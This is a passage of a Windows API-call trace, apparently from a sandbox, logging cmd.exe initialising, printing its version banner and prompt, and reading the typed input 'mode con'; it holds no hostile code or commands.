lpType=0x20e860, lpData=0x20e880, lpcbData=0x20e864*=0x1000 | out: lpType=0x20e860*=0x4, lpData=0x20e880*=0x9, lpcbData=0x20e864*=0x4) returned 0x0 [0034.764] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e860, lpData=0x20e880, lpcbData=0x20e864*=0x1000 | out: lpType=0x20e860*=0x0, lpData=0x20e880*=0x9, lpcbData=0x20e864*=0x1000) returned 0x2 [0034.765] RegCloseKey (hKey=0x44) returned 0x0 [0034.765] time (in: timer=0x0 | out: timer=0x0) returned 0x5cdd77bb [0034.765] srand (_Seed=0x5cdd77bb) [0034.765] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\"" [0034.765] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\"" [0034.765] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e1c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0034.765] GetProcessHeap () returned 0x2f0000 [0034.765] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x218) returned 0x30aa10 [0034.765] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x30aa20, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0034.765] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e0f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0034.765] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e0f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0034.765] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49e0f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0034.765] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0034.765] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0034.765] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0034.765] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0034.765] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0034.765] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0034.765] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0034.765] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0034.766] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0034.766] GetProcessHeap () returned 0x2f0000 [0034.766] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3094f0 | out: hHeap=0x2f0000) returned 1 [0034.766] GetEnvironmentStringsW () returned 0x308a60* [0034.766] GetProcessHeap () returned 0x2f0000 [0034.766] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xa94) returned 0x30ac30 [0034.766] FreeEnvironmentStringsW (penv=0x308a60) returned 1 [0034.766] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49e0f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0034.766] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49e0f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0034.766] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0034.766] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0034.766] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0034.766] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0034.766] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0034.766] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0034.766] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0034.766] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0034.766] GetProcessHeap () returned 0x2f0000 [0034.766] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x5c) returned 0x30b6d0 [0034.766] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20f670 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0034.766] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x20f670, lpFilePart=0x20f650 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x20f650*="Desktop") returned 0x25 [0034.766] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0034.766] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x20f380 | out: lpFindFileData=0x20f380*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0x30b740 [0034.766] FindClose (in: hFindFile=0x30b740 | out: hFindFile=0x30b740) returned 1 [0034.766] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x20f380 | out: lpFindFileData=0x20f380*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x30b740 [0034.767] FindClose (in: hFindFile=0x30b740 | out: hFindFile=0x30b740) returned 1 [0034.767] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0034.767] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x20f380 | out: lpFindFileData=0x20f380*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1a260000, ftLastAccessTime.dwHighDateTime=0x1d50bf6, ftLastWriteTime.dwLowDateTime=0x1a260000, ftLastWriteTime.dwHighDateTime=0x1d50bf6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0x30b740 [0034.767] FindClose (in: hFindFile=0x30b740 | out: hFindFile=0x30b740) returned 1 [0034.767] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0034.767] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0034.767] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0034.767] GetProcessHeap () returned 0x2f0000 [0034.767] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x30ac30 | out: hHeap=0x2f0000) returned 1 [0034.767] GetEnvironmentStringsW () returned 0x30b740* [0034.767] GetProcessHeap () returned 0x2f0000 [0034.767] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xae8) returned 0x30c230 [0034.767] FreeEnvironmentStringsW (penv=0x30b740) returned 1 [0034.767] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e1c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0034.767] GetProcessHeap () returned 0x2f0000 [0034.767] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x30b6d0 | out: hHeap=0x2f0000) returned 1 [0034.767] GetProcessHeap () returned 0x2f0000 [0034.767] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x4016) returned 0x30cd20 [0034.768] GetProcessHeap () returned 0x2f0000 [0034.768] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x30cd20 | out: hHeap=0x2f0000) returned 1 [0034.768] GetConsoleOutputCP () returned 0x1b5 [0034.768] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e1bfe0 | out: lpCPInfo=0x49e1bfe0) returned 1 [0034.768] GetUserDefaultLCID () returned 0x409 [0034.768] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49e17b50, cchData=8 | out: lpLCData=":") returned 2 [0034.768] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x20f780, cchData=128 | out: lpLCData="0") returned 2 [0034.768] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20f780, cchData=128 | out: lpLCData="0") returned 2 [0034.768] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20f780, cchData=128 | out: lpLCData="1") returned 2 [0034.768] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49e2a740, cchData=8 | out: lpLCData="/") returned 2 [0034.768] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49e2a4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0034.768] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49e2a460, cchData=32 | out: lpLCData="Tue") returned 4 [0034.768] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49e2a420, cchData=32 | out: lpLCData="Wed") returned 4 [0034.768] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49e2a3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0034.768] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49e2a3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0034.769] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49e2a360, cchData=32 | out: lpLCData="Sat") returned 4 [0034.769] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49e2a700, cchData=32 | out: lpLCData="Sun") returned 4 [0034.769] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49e17b40, cchData=8 | out: lpLCData=".") returned 2 [0034.769] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49e2a4e0, cchData=8 | out: lpLCData=",") returned 2 [0034.769] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0034.769] GetProcessHeap () returned 0x2f0000 [0034.769] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0x20c) returned 0x3095c0 [0034.769] GetConsoleTitleW (in: lpConsoleTitle=0x3095c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0034.770] _get_osfhandle (_FileHandle=1) returned 0xf4 [0034.770] GetFileType (hFile=0xf4) returned 0x3 [0034.770] BrandingFormatString () returned 0x3097e0 [0034.790] GetVersion () returned 0x1db10106 [0034.790] _vsnwprintf (in: _Buffer=0x20f8f0, _BufferCount=0x1f, _Format="%d.%d.%04d", _ArgList=0x20f888 | out: _Buffer="6.1.7601") returned 8 [0034.790] _get_osfhandle (_FileHandle=1) returned 0xf4 [0034.790] GetFileType (hFile=0xf4) returned 0x3 [0034.790] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x49e26340, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Microsoft Windows [Version %1]") returned 0x1e [0034.790] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x49e26340, nSize=0x2000, Arguments=0x20f890 | out: lpBuffer="Microsoft Windows [Version 6.1.7601]") returned 0x24 [0034.790] _get_osfhandle (_FileHandle=1) returned 0xf4 [0034.790] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Microsoft Windows [Version 6.1.7601]", cchWideChar=-1, lpMultiByteStr=0x49e1c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Windows [Version 6.1.7601]", lpUsedDefaultChar=0x0) returned 37 [0034.790] WriteFile (in: hFile=0xf4, lpBuffer=0x49e1c320*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x20f818, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesWritten=0x20f818*=0x24, lpOverlapped=0x0) returned 1 [0034.790] _vsnwprintf (in: _Buffer=0x49e26340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x20f8b8 | out: _Buffer="\r\n") returned 2 [0034.790] _get_osfhandle (_FileHandle=1) returned 0xf4 [0034.790] GetFileType (hFile=0xf4) returned 0x3 [0034.790] _get_osfhandle (_FileHandle=1) returned 0xf4 [0034.790] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x49e1c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0034.790] WriteFile (in: hFile=0xf4, lpBuffer=0x49e1c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x20f888, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesWritten=0x20f888*=0x2, lpOverlapped=0x0) returned 1 [0034.790] _vsnwprintf (in: _Buffer=0x49e26340, _BufferCount=0x1fff, _Format="%s", _ArgList=0x20f8b8 | out: _Buffer="Copyright (c) 2009 Microsoft Corporation. All rights reserved.") returned 63 [0034.790] _get_osfhandle (_FileHandle=1) returned 0xf4 [0034.790] GetFileType (hFile=0xf4) returned 0x3 [0034.790] _get_osfhandle (_FileHandle=1) returned 0xf4 [0034.790] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Copyright (c) 2009 Microsoft Corporation. All rights reserved.", cchWideChar=-1, lpMultiByteStr=0x49e1c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Copyright (c) 2009 Microsoft Corporation. All rights reserved.", lpUsedDefaultChar=0x0) returned 64 [0034.790] WriteFile (in: hFile=0xf4, lpBuffer=0x49e1c320*, nNumberOfBytesToWrite=0x3f, lpNumberOfBytesWritten=0x20f888, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesWritten=0x20f888*=0x3f, lpOverlapped=0x0) returned 1 [0034.790] _vsnwprintf (in: _Buffer=0x49e26340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x20f8b8 | out: _Buffer="\r\n") returned 2 [0034.790] _get_osfhandle (_FileHandle=1) returned 0xf4 [0034.790] GetFileType (hFile=0xf4) returned 0x3 [0034.790] _get_osfhandle (_FileHandle=1) returned 0xf4 [0034.790] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x49e1c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0034.790] WriteFile (in: hFile=0xf4, lpBuffer=0x49e1c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x20f888, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesWritten=0x20f888*=0x2, lpOverlapped=0x0) returned 1 [0034.791] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000 [0034.791] GetProcAddress (hModule=0x76e30000, lpProcName="CopyFileExW") returned 0x76e423d0 [0034.791] GetProcAddress (hModule=0x76e30000, lpProcName="IsDebuggerPresent") returned 0x76e38290 [0034.791] GetProcAddress (hModule=0x76e30000, lpProcName="SetConsoleInputExeNameW") returned 0x76e417e0 [0034.791] _get_osfhandle (_FileHandle=0) returned 0xe8 [0034.791] GetFileType (hFile=0xe8) returned 0x3 [0034.791] _setmode (_FileHandle=0, _Mode=32768) returned 16384 [0034.791] NtOpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x8, OpenAsSelf=0, TokenHandle=0x20f6e0 | out: TokenHandle=0x20f6e0*=0x0) returned 0xc000007c [0034.791] NtOpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0x20f6e0 | out: TokenHandle=0x20f6e0*=0x50) returned 0x0 [0034.791] NtQueryInformationToken (in: TokenHandle=0x50, TokenInformationClass=0x12, TokenInformation=0x20f6f0, TokenInformationLength=0x4, ReturnLength=0x20f6f8 | out: TokenInformation=0x20f6f0, ReturnLength=0x20f6f8) returned 0x0 [0034.791] NtQueryInformationToken (in: TokenHandle=0x50, TokenInformationClass=0x1a, TokenInformation=0x20f6f8, TokenInformationLength=0x4, ReturnLength=0x20f6f0 | out: TokenInformation=0x20f6f8, ReturnLength=0x20f6f0) returned 0x0 [0034.791] NtClose (Handle=0x50) returned 0x0 [0034.791] FormatMessageW (in: dwFlags=0x1900, lpSource=0x0, dwMessageId=0x40002748, dwLanguageId=0x0, lpBuffer=0x20f6c0, nSize=0x0, Arguments=0x20f6c8 | out: lpBuffer="\x97e0\x30") returned 0xf [0034.791] GetProcessHeap () returned 0x2f0000 [0034.791] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x218) returned 0x2f1ab0 [0034.791] GetConsoleTitleW (in: lpConsoleTitle=0x20f710, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0034.791] wcsstr (_Str="C:\\Windows\\system32\\cmd.exe", _SubStr="Administrator: ") returned 0x0 [0034.791] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 1 [0034.792] GetProcessHeap () returned 0x2f0000 [0034.792] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x2f1ab0 | out: hHeap=0x2f0000) returned 1 [0034.792] LocalFree (hMem=0x3097e0) returned 0x0 [0034.792] GetProcessHeap () returned 0x2f0000 [0034.792] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x30aa10 | out: hHeap=0x2f0000) returned 1 [0034.792] _vsnwprintf (in: _Buffer=0x49e26340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x20f3f8 | out: _Buffer="\r\n") returned 2 [0034.792] _get_osfhandle (_FileHandle=1) returned 0xf4 [0034.792] GetFileType (hFile=0xf4) returned 0x3 [0034.792] _get_osfhandle (_FileHandle=1) returned 0xf4 [0034.792] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x49e1c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0034.792] WriteFile (in: hFile=0xf4, lpBuffer=0x49e1c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x20f3c8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesWritten=0x20f3c8*=0x2, lpOverlapped=0x0) returned 1 [0034.793] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49e0f360, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0034.793] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e1c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0034.793] _vsnwprintf (in: _Buffer=0x49e0eb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x20f408 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0034.793] _vsnwprintf (in: _Buffer=0x49e0ebaa, _BufferCount=0x3d9, _Format="%c", _ArgList=0x20f408 | out: _Buffer=">") returned 1 [0034.793] _get_osfhandle (_FileHandle=1) returned 0xf4 [0034.793] GetFileType (hFile=0xf4) returned 0x3 [0034.793] _get_osfhandle (_FileHandle=1) returned 0xf4 [0034.793] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop>", cchWideChar=-1, lpMultiByteStr=0x49e1c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop>", lpUsedDefaultChar=0x0) returned 39 [0034.793] WriteFile (in: hFile=0xf4, lpBuffer=0x49e1c320*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x20f3f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesWritten=0x20f3f8*=0x26, lpOverlapped=0x0) returned 1 [0034.793] _get_osfhandle (_FileHandle=0) returned 0xe8 [0034.793] GetFileType (hFile=0xe8) returned 0x3 [0034.793] _get_osfhandle (_FileHandle=0) returned 0xe8 [0034.793] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0034.793] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0034.793] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e320, cchWideChar=1 | out: lpWideCharStr="m") returned 1 [0034.794] _get_osfhandle (_FileHandle=0) returned 0xe8 [0034.794] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0034.794] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0034.794] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e322, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0034.794] _get_osfhandle (_FileHandle=0) returned 0xe8 [0034.794] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0034.794] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0034.794] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e324, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0034.794] _get_osfhandle (_FileHandle=0) returned 0xe8 [0034.794] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0034.794] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0034.794] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e326, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0034.794] _get_osfhandle (_FileHandle=0) returned 0xe8 [0034.794] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0034.794] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0034.794] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e328, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0034.794] _get_osfhandle (_FileHandle=0) returned 0xe8 [0034.794] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0034.794] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0034.794] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e32a, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0034.794] _get_osfhandle (_FileHandle=0) returned 0xe8 [0034.794] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0034.794] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0034.794] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e32c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0034.794] _get_osfhandle (_FileHandle=0) returned 0xe8 [0034.794] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0034.794] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0034.795] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e32e, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0034.795] _get_osfhandle (_FileHandle=0) returned 0xe8 [0034.795] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0034.795] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0034.795] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e330, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0034.795] _get_osfhandle (_FileHandle=0) returned 0xe8 [0034.795] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0034.795] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 